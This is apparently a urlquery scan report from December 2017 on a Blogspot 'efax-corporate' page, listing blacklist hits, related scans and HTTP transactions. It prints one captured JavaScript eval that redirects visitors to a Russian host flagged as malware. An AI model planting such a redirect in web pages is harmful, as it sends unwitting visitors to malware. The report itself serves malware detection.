Overview

URL tektekdunk.blogspot.com.es/2013/03/efax-corporate.html
IP172.217.22.161
ASNAS15169 Google Inc.
Location United States
Report completed2017-12-11 21:36:43 CET
StatusLoading report..
urlquery Alerts Detects suspicious URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-12-11 2 tektekdunk.blogspot.com.es/2013/03/efax-corporate.html Malware
2017-12-11 2 tektekdunk.blogspot.no/2013/03/efax-corporate.html Malware
2017-12-11 2 forumla.ru:8080/forum/links/column.php Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 172.217.22.161

Date UQ / IDS / BL URL IP
2018-01-11 17:47:01 +0100
0 - 0 - 0 https://mail-attachment.googleusercontent.com (...) 172.217.22.161
2018-01-11 17:21:12 +0100
0 - 0 - 2 boy-creative.blogspot.com/p/drama.htm 172.217.22.161
2018-01-11 16:55:05 +0100
0 - 0 - 5 hmpfisikauinsgd.blogspot.com/ 172.217.22.161
2018-01-11 16:54:54 +0100
0 - 2 - 0 https://rihac.blogspot.com/2013/11/dampak-pos (...) 172.217.22.161
2018-01-11 16:47:57 +0100
0 - 1 - 5 ndikichida.blogspot.com/2012/01/makalah-siste (...) 172.217.22.161
2018-01-11 16:45:56 +0100
2 - 0 - 2 realhackerspoint.blogspot.com/2013/05/trackin (...) 172.217.22.161
2018-01-11 16:43:21 +0100
0 - 0 - 2 pequenosescritores-carmelinha.blogspot.com.br (...) 172.217.22.161
2018-01-11 16:25:15 +0100
0 - 0 - 1 afrixgames.blogspot.com/2013/02/free-download (...) 172.217.22.161
2018-01-11 16:20:41 +0100
0 - 0 - 2 boy-creative.blogspot.com/p/sastra-sunda.htm 172.217.22.161
2018-01-11 16:11:23 +0100
0 - 0 - 0 https://lh5.googleusercontent.com/itnz7iF9M2a (...) 172.217.22.161

Last 10 reports on ASN: AS15169 Google Inc.

Date UQ / IDS / BL URL IP
2018-01-21 08:56:51 +0100
0 - 0 - 2 www.debrastagi.com/2011/10/kaspersky-keys-kav (...) 172.217.21.147
2018-01-21 08:41:02 +0100
0 - 0 - 2 josh-morgan-subways-news.blogspot.se/search/l (...) 172.217.21.129
2018-01-21 08:31:18 +0100
0 - 0 - 1 canaldefutbolenvivo.com/ 172.217.21.147
2018-01-21 08:24:06 +0100
2 - 0 - 6 apenasmediafire.blogspot.com/search/label/fil (...) 172.217.21.129
2018-01-21 08:20:01 +0100
0 - 0 - 1 venturead.com/script/suurl.php?r=1225997 23.236.58.71
2018-01-21 08:07:53 +0100
0 - 0 - 1 harry-judd-attitude-news.blogspot.com.es/sear (...) 172.217.21.129
2018-01-21 07:58:10 +0100
0 - 0 - 3 www.disappointeddisappointing2608.blogspot.fr (...) 172.217.21.129
2018-01-21 07:57:51 +0100
0 - 0 - 2 disappointeddisappointing2608.blogspot.fr/sea (...) 172.217.21.129
2018-01-21 07:54:23 +0100
0 - 0 - 4 baixarfifa15.blogspot.com/search/label/FIFA%2 (...) 172.217.21.129
2018-01-21 07:47:41 +0100
2 - 0 - 3 www.medicineforthepeoplee.com/2017/09/downloa (...) 172.217.21.147

Last 3 reports on domain: tektekdunk.blogspot.com.es

Date UQ / IDS / BL URL IP
2017-11-19 01:01:22 +0100
1 - 0 - 4 www.tektekdunk.blogspot.com.es/2013/02/britis (...) 216.58.211.129
2017-11-19 01:01:19 +0100
1 - 0 - 3 tektekdunk.blogspot.com.es/2013/02/british-ai (...) 216.58.211.129
2017-10-03 15:05:36 +0200
1 - 0 - 3 tektekdunk.blogspot.com.es/2013/03/efax-corpo (...) 216.58.209.97


JavaScript

Executed Scripts (9)


Executed Evals (1)

#1 JavaScript::Eval (size: 103, repeated: 1) - SHA256: dd2018ac1ec631bba571e09c1e98b575723d706f8a243c854a88aaeeb3b8adfc

                                        var1 = 49;
var2 = var1;
if (var1 == var2) {
    document.location = "http://forumla.ru:8080/forum/links/column.php";
}
                                    

Executed Writes (0)



HTTP Transactions (26)


Request Response
                                        
                                            GET /2013/03/efax-corporate.html HTTP/1.1 
Host: tektekdunk.blogspot.com.es
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         172.217.22.161
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
                                        
Location: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html
Content-Encoding: gzip
Date: Mon, 11 Dec 2017 20:42:46 GMT
Expires: Mon, 11 Dec 2017 20:42:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 198
Server: GSE


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   198
Md5:    dd0ca61e116adc288d7076c7ea513c8c
Sha1:   a78d46d7eec4a807fcc1f048c804a9e4a0eb21b8
Sha256: 50ae66c4efc349e9c0de9cc77b4808e3aa5fffc5da5f46014a2f7609e0a2e1d4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /2013/03/efax-corporate.html HTTP/1.1 
Host: tektekdunk.blogspot.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Expires: Mon, 11 Dec 2017 20:42:46 GMT
Date: Mon, 11 Dec 2017 20:42:46 GMT
Cache-Control: private, max-age=0
Last-Modified: Fri, 03 Oct 2014 07:32:15 GMT
Etag: W/"03a63c64f71485c82a2f64efbd0a532eda39d83c9bcec59e8f439a250f07389a"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 9125
Server: GSE


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   9125
Md5:    11a8bc370f0c5fd740a076603beb65d7
Sha1:   50d0b0cd4260be907683b7793f26cbdcadfbcc1f
Sha256: 67ce5835f45bca284004ac039911380c6d2fa45d659fe5918feec1720be2a597

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Dec 2017 20:42:46 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    19ef99ced385814f909e722e58764dcc
Sha1:   fb13af586cea82c57026e511346d56968a9816b0
Sha256: da16f981c66b594aadc1f084caabcd5fce2d21c25812b8849317c460d1282082
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    6bf50ec404fb4a8b4a94be8390d11938
Sha1:   0caaab7704d6221abc5e0342909a4928cee50b1c
Sha256: 63b592179b1e9a528344ce1d430b9479fc55f43420a468ec35aaeaa9dff911cf
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    6200946bb21dadf64e775be4c1477589
Sha1:   20dadb32b68b14a5e6a5553c9f2b8513c9fc57b6
Sha256: f3d5bf0b6153233f3561176e789aea80d29708f7f98019d416ae6c31927d04a7
                                        
                                            GET /static/v1/widgets/3332739511-widget_css_bundle.css HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7982
Date: Sat, 09 Dec 2017 19:26:50 GMT
Expires: Sun, 09 Dec 2018 19:26:50 GMT
Last-Modified: Sat, 09 Dec 2017 18:25:48 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 177357
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   7982
Md5:    d342012bb968e58616411584557ea607
Sha1:   8e698a3e4a67432fd5b28eb68a7d00ce52bc13f5
Sha256: 4e02127ac31a445d8ebb1681f44c2ceb56e7e55d1d2a443a80962909b0c23467
                                        
                                            GET /serve/namelesscreator.googlepages.com/recent-post.js HTTP/1.1 
Host: bloggerhosting.appspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         216.58.211.148
HTTP/1.1 503 Service Unavailable
Content-Type: text/html
                                        
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: Google Frontend
Content-Length: 95


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   95
Md5:    30546616f959cdf65e943e65f1e025f5
Sha1:   970c065540d7fbcc9296ebb4c1ca0294abd3c103
Sha256: 25ca9c49ab16a0e83faac79b06ddc8b15ee7f3118f09e2b7b2b46da52a1e9fa1
                                        
                                            GET /js/plusone.js HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
x-ua-compatible: IE=edge, chrome=1
Timing-Allow-Origin: *
Etag: "aac1a14663d33bf4c6d07795a47bf6bc"
Expires: Mon, 11 Dec 2017 20:42:47 GMT
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: private, max-age=1800, stale-while-revalidate=1800
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Strict-Transport-Security: max-age=31536000
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=119=okMAMXITwUeoVMUnyDvoWK4M8Ux77yzEn8sE00KBAHltyUxDgb6tjWlXAya7G9toN2SW51IP3J5_XtY7Q48K8NLilI3i1AyfEORQNnHsXxFYvnSXNq0TE0LR4iTiXgPv;Domain=.google.com;Path=/;Expires=Tue, 12-Jun-2018 20:42:47 GMT;HttpOnly
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   16872
Md5:    47d2a610f3a4575abf4744830b10f05a
Sha1:   5462683eca02fbab223acaba81db21a354323ff0
Sha256: d35c4db71a7ea54c94e6b2ca7ca8184bbfb16f9f9f436e1c715a80d3bfbcd959
                                        
                                            GET /static/v1/jsbin/1930376684-comment_from_post_iframe.js HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4408
Date: Sat, 09 Dec 2017 19:27:43 GMT
Expires: Sun, 09 Dec 2018 19:27:43 GMT
Last-Modified: Sat, 09 Dec 2017 15:22:43 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 177304
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   4408
Md5:    51c14805118fe950fd6aa861ef4813fb
Sha1:   d5d4b010d0a2920a4c115f656d800c30d7fa54b8
Sha256: 93262de70a34fb45095a255d5f8b2d118c224324da33bd151bc95cfeaea38358
                                        
                                            GET /static/v1/widgets/2060351197-widgets.js HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 45861
Date: Sat, 09 Dec 2017 19:31:23 GMT
Expires: Sun, 09 Dec 2018 19:31:23 GMT
Last-Modified: Sat, 09 Dec 2017 08:25:15 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 177084
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   45861
Md5:    8c80881ffc98fdd432739691fb9ff023
Sha1:   111b9b51194ed6d5b4a3f761e4819083104b2531
Sha256: cdcc802712c549875eb16f72a2bb3d0e2977d3257344ee244060c110e54274ec
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: segienim.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"23e038e0acbb18ea0d9e91c70edec61b28f6e13f71626d5e19091489397de570"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Thu, 17 Sep 2015 05:59:07 GMT
Content-Length: 13992
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13992
Md5:    e83d9daf2461158be85dca2efc33d58d
Sha1:   19ea1cd89879b5d775d1cedfbd329568ddfe0bdc
Sha256: 7e4d3beb023f84c747a0e9384141e5abdea86c07646ea7a5f9e4805f29204c89
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: tektekdunk.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"649c2b624a618ecabc6ec29fb05677317bab3b850e04e8173840ce7a062d9518"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 03 Oct 2014 07:32:15 GMT
Content-Length: 13991
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13991
Md5:    fa6017b44b1bb35129006c95c8f00001
Sha1:   cdfb5f053feb6b92bc72501b1f9e0db99c5fc471
Sha256: 0335701913da1d7fc30183fbe6318d7a947e54a95b06de05890b31925fc046f5
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: ziggot.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"246c4f0d4f65a7cd1462d1333a357025d87ae7931f0435194db338b0a9a802ed"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Tue, 07 Oct 2014 02:11:15 GMT
Content-Length: 13956
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13956
Md5:    887f05ecc30796b40fa9c3ca6dbe570d
Sha1:   aa44cb58969f7af477fee4b6b4b1cdb0c7eec6d5
Sha256: c8b732a870b6a16202c952e6687f3a6268a606aaf48d55c6bbd07d8d8bd61587
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: assudah.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"fd68d633fad54d82c5222c93f853962ce9e77db731b0ef30c8b63166f6e767ed"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Thu, 02 Oct 2014 05:51:44 GMT
Content-Length: 13949
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13949
Md5:    f8792562f5f360c7302a5f415284665a
Sha1:   8caaa23a95f196b428b5fe145bfb21654de14d74
Sha256: 4e3e7644726bff5c2b245eea4c40cac6bd64883ccded745f92e85b8208f41cf3
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: alabik.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"37f994e53eff9fb3193acdd80ffb8b86932ed2a2ef0948f460a7e01f0d83de9c"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Sun, 19 Nov 2017 15:39:20 GMT
Content-Length: 35849
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   35849
Md5:    502376b485e9d6c4d4eec2ca1b7563b6
Sha1:   77da4be0769cab1223a7d37d746dad1384de5be0
Sha256: 657e7bbb1b487c9a2e5327568fd57c926e022a804b6baf53988e0c46a297edc5
                                        
                                            GET /dyn-css/authorization.css?targetBlogID=4915900961802978781&zx=014439bd-0793-4c4d-a51b-3c274c89153e HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/css; charset=UTF-8
                                        
P3P: CP="This is not a P3P policy! See https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Cache-Control: private, max-age=1800
Pragma: no-cache
Expires: Mon, 11 Dec 2017 20:42:47 GMT
Date: Mon, 11 Dec 2017 20:42:47 GMT
Last-Modified: Mon, 11 Dec 2017 20:42:47 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   21
Md5:    b9afc501fc43fbea335a2dc5d43263a1
Sha1:   7290a2dd6afbf39ecfc35b52dfb32a38fc222994
Sha256: d6e425ca7840c0ab6f26f5fc2822a47e26b4a8bbd104468a9c185bc132b8662f
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: babakbingkas.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"65f52af629a004797d8277b3788d45ce05e37292c2d9e935c0a57526da3569f0"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Thu, 02 Oct 2014 05:57:50 GMT
Content-Length: 13555
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13555
Md5:    270406a5a1537988ef6d0d92d52d6673
Sha1:   38ae8d8c7ddc0c375e1f3dd51629ca7079ebfb09
Sha256: 689e87ee082da53d796fc69cd565424fd509e34cd9621020c01eaa91104300ba
                                        
                                            GET /img/icon18_edit_allbkg.gif HTTP/1.1 
Host: resources.blogblog.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Accept-Ranges: bytes
Content-Length: 162
Date: Sat, 09 Dec 2017 19:33:11 GMT
Expires: Sat, 16 Dec 2017 19:33:11 GMT
Last-Modified: Fri, 08 Dec 2017 19:28:35 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 176976
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 18 x 18
Size:   162
Md5:    c991641178ff05adf0d004298b5eafa9
Sha1:   d8f6ce8ecd92b86d49849360f6b81ceb10b4c941
